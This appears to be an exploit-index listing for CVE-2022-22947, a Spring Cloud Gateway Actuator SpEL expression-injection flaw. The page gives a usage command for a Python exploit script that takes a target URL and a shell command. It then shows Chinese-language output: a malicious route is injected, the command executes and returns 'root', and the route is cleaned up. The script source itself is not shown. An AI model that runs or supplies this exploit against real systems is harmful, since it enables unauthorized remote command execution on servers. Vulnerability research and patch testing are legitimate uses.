Exploit for Expression Language Injection in Vmware Spring Cloud Gateway CVE-2022-22947

Name: Exploit for Expression Language Injection in Vmware Spring Cloud Gateway CVE-2022-22947
Rating: 5 (183 reviews)

2023-05-26 | CVSS 6.8

## https://sploitus.com/exploit?id=BDDB5B64-68C0-57EF-B41D-44F283D0C7E3
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp

Use：python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami"
Result：
添加恶意SpEL表达式路由成功！
路由刷新成功！
攻击结果获取成功: 

================================================
root

================================================
恶意路由已删除！
路由刷新成功！